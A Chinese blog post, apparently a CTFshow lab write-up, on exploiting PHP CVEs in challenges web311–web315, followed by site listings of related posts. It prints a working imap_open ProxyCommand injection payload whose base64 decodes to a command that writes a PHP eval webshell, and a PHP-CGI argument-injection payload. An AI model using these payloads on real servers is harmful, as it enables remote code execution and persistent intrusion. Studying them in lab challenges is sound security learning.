web311~web315phpCVE

最新推荐文章于 2025-11-30 09:34:58 发布
原创 最新推荐文章于 2025-11-30 09:34:58 发布 · 213 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web3

web311:cve-2019-11043

影响范围:

在 Nginx + PHP-FPM 环境下

PHP 5.6版本也受此漏洞影响,但目前只能 Crash,不可以远程代码执行:

PHP 7.0 版本、PHP 7.1 版本、PHP 7.2 版本、PHP 7.3 版本

 漏洞分析

poc

 

web312 PHP imap 远程命令执行漏洞(CVE-2018-19518)

漏洞介绍

poc:

hostname=x+-oProxyCommand%3decho%09通过base64加密过的执行语句|base64%09-d|sh}

本题payload:

先对一句话base64,再用echo解码

echo "一句话" | base64 -d >/var/www/html/shell.php

hostname=x+-oProxyCommand%3decho%09ZWNobyAiUEQ5d2FIQWdRR1YyWVd3b0pGOVFUMU5VVzIxdGJWMHBPejgrIiB8IGJhc2U2NCAtZCA+L3Zhci93d3cvaHRtbC9zaGVsbC5waHA%3D|base64%09-d|sh}

=要url编码

 web313:CVE-2012-1823

 漏洞分析

通过阅读源码,我发现cgi模式下有如下一些参数可用:

  • -c 指定php.ini文件的位置
  • -n 不要加载php.ini文件
  • -d 指定配置项
  • -b 启动fastcgi进程
  • -s 显示文件源码
  • -T 执行指定次该文件
  • -h-? 显示帮助

 -d的用法

<?php echo shell_exec('ls');?>
 
?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input

 

web315:XDebug 远程调试漏洞

hint

debug开启,端口9000

vulnhub上有exp

ctfshow phpCVE web311&web313
2301_81040377的博客
06-01 451
这个漏洞工具的使用必须要有go环境哦。来制造任意文件漏洞,执行任意代码。用到的cgi模式下的参数。然后可以使用-d来指定。这道题是一个版本漏洞。
ctfshow web入门phpcve web311-315
m0_62207170的博客
04-24 617
ctfshow web入门phpcve web311-315
ctfshow phpCVE web311-web315 wp
mumuzi的博客
02-04 2428
ctfshow-php-CVE-wp----------
CTFSHOW-phpCVE Writeup
weixin_59419135的博客
11-25 1559
ctfshow phpCVEweb311,web312,web313,web314,web315) CVE-2019-11043,CVE-2018-19935,CVE-2012-1823,PHP_SESSION_UPLOAD_PROGRESS文件包含, XDebug 远程调试漏洞
ctfshow phpCVE web311~315
shinygod的博客
10-07 842
php imap扩展用于在PHP中执行邮件收发操作。其imap_open函数会调用rsh来连接远程shell,而debian/ubuntu中默认使用ssh来代替rsh的功能(也就是说,在debian系列系统中,执行rsh命令实际执行的是ssh命令)。因为ssh命令中可以通过设置-oProxyCommand=来调用第三方命令,攻击者通过注入注入这个参数,最终将导致命令执行漏洞。
ctfshow web入门 phpCVE web312&&web314
2301_81040377的博客
05-14 410
其imap_open函数会调用rsh来连接远程shell,而debian/ubuntu中默认使用ssh来代替rsh的功能(也就是说,在debian系列系统中,执行rsh命令实际执行的是ssh命令)。因为ssh命令中可以通过设置-oProxyCommand=来调用第三方命令,攻击者通过注入注入这个参数,最终将导致命令执行漏洞。又因为ssh命令中可以通过设置oProxyCommand来调用第三方命令,所以攻击者通过注入这个参数,最终将导致命令执行漏洞。看wp说的是Debian的系统,我把眼睛看花也没找到。
Phpcve
m0_74402888的博客
07-26 839
在上面的配置下,我们访问http://target/index.php?XDEBUG_SESSION_START=phpstorm,目标服务器的XDebug将会连接访问者的IP(或X-Forwarded-For头指定的地址)并通过dbgp协议与其通信,我们通过dbgp中提供的eval方法即可在目标服务器上执行任意PHP代码。利用 User-Agent 把shell写入日志,然后再包含日志就可以了,又因为使用的是 Nginx 服务器,所以默认日志位置为 /var/log/nginx/access.log。
WEB渗透的一些功能.zip
11-29
WEB渗透的一些功能剑WordPressWordPress用户名检测、登录密码暴破。...Thead不建议修改。莱弗雷CVE-2020-7961的漏洞...HTTP PUT,批量扫描利用PHPCVE-2024-4577批量扫描,Getshell,getshell针对的是xampp的架构,通过其默
ctf_show笔记篇(web入门---phpCVE
whale_waves的博客
03-22 1386
CVE-2019-11043漏洞是PHP的一个远程代码执行漏洞,该漏洞产生与Nginx利用fastcgi_split_path_info在处理带有 %0a 的请求时,会因为遇到换行符(%0a)导致PATH_INFO为空,最终可导致任意代码执行。头指定的地址)并通过dbgp协议与其通信,我们通过dbgp中提供的eval方法即可在目标服务器上执行任意PHP代码。x+-oProxyCommand=echo 'base64编码后的命令'|base64 -d|sh}漏洞名称:PHP-CGI远程代码执行漏洞。
CTFSHOW | phpCVE题解 web311 - web315
WayneJH的博客
08-10 2959
CTFSHOW phpCVE专题详细题解
Ctfshow web入门 phpCVEweb311-web315 详细题解 全
Jay17的博客
09-23 1227
Ctfshow web入门 phpCVEweb311-web315 详细题解 全
ctf.show的phpCVE(web311-web315)
wanan的博客
09-30 440
ctf.show的phpCVE(web311-web315)
CTFshow刷题日记-WEB-PHPCVE(web311-315)包括PHP-fpm远程代码执行,PHPimap_open函数任意命令执行,PHP-CGI远程代码执行,XDebug 远程调试漏洞
Love&Share
10-03 3316
web311-CVE-2019-11043-PHP-fpm远程代码执行漏洞 提示:似曾相识,就这一个文件,不用扫描 注释中只有一个<!-- cve-->用burp抓包发现响应行中的X-Powered-By字段很可疑 谷歌之后发现该PHP版本存在漏洞:PHP 远程代码执行漏洞(CVE-2019-11043 漏洞原理 CVE-2019-11043 是一个远程代码执行漏洞,使用某些特定配置的 Nginx + PHP-FPM 的服务器存在漏洞,可允许攻击者远程执行代码 向Nginx + PHP-FP
CVE-2019-11043 PHP-FPM 复现和学习(环境CTFShow web311
paidx0
08-09 595
CVE-2019-11043复现和学习 漏洞描述 CVE-2019-11043 是一个远程代码执行漏洞,使用某些特定配置的 Nginx + PHP-FPM 的服务器存在漏洞,可允许攻击者远程执行代码。 向Nginx + PHP-FPM的服务器 URL发送 %0a 时,服务器返回异常。 该漏洞需要在nginx.conf中进行特定配置才能触发。 location ~ [^/]\.php(/|$) { ... fastcgi_split_path_info ^(.+?\.php)(/.*)$; fastcg
CTFSHOW PHPCVE复现
snowlyzz的博客
10-03 996
PHPCVE 复现学习
小迪上课笔记之Web3——Sodility基础篇1
cream_t_g的博客
11-29 925
本文介绍了Solidity智能合约开发的基础知识,包括合约创建、变量声明、函数类型(view/pure)、状态变量读写权限(public/view/pure)、存储位置(memory/storage)等核心概念。通过Hello World示例演示了合约编译和部署过程,并详细讲解了合约结构、构造函数、地址获取(msg.sender/address(this))、文件导入(import)、接口使用(interface)等关键功能。
Web3 基于区块链的下一代互联网(科普)
青蛙king的博客
11-30 691
Web3是基于区块链的下一代互联网,其核心特征包括去中心化、用户自持身份、可验证性和抗审查等。Web3的三大支柱是加密资产、区块链和智能合约,关键形态涵盖钱包、DeFi、NFT、DAO和GameFi。在技术架构上,Web3将传统后端的很大部分功能交给智能合约和区块链处理,形成了"跨前端+链上后端"的全栈模式。Web3前端工程师需要掌握钱包交互、智能合约调用等新技能,而后端则演变为数据服务和链下基础设施。智能合约成为新的"硬核后端",Web3全栈工程师(前端+Solid
JAVA毕业设计含文档和代码springboot凉州区助农惠农服务平台
最新发布
11-30
JAVA毕业设计含文档和代码springboot凉州区助农惠农服务平台
【四轴飞行器的位移控制】控制四轴飞行器的姿态和位置设计内环和外环PID控制回路(Simulink仿真实现)
11-30
【四轴飞行器的位移控制】控制四轴飞行器的姿态和位置设计内环和外环PID控制回路(Simulink仿真实现)内容概要:本文围绕四轴飞行器的位移控制展开,重点介绍如何通过设计内环和外环PID控制回路来实现对其姿态和位置的精确控制。外环负责根据期望位移生成姿态指令,内环则依据这些指令调节飞行器的实际姿态,从而实现稳定的位置跟踪。整个控制系统在Simulink环境中进行建模与仿真,便于验证控制策略的有效性与鲁棒性。文中详细阐述了四轴飞行器的动力学模型、控制结构设计原理以及PID参数整定方法,帮助读者深入理解飞行器控制的核心机制。; 适合人群:具备自动控制理论基础和Simulink仿真经验的高校学生、科研人员及从事无人机控制开发的工程师。; 使用场景及目标:①用于教学实践中帮助学生掌握多变量控制系统的设计方法;②为无人机姿态与位置控制系统的开发提供可复现的仿真框架;③支持进一步研究高级控制算法(如串级控制、自适应控制)在飞行器中的应用。; 阅读建议:建议读者结合Simulink模型同步操作,动手调试PID参数以观察系统响应变化,加深对内外环协同控制机制的理解,并可在此基础上拓展为非线性或智能控制策略的研究。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值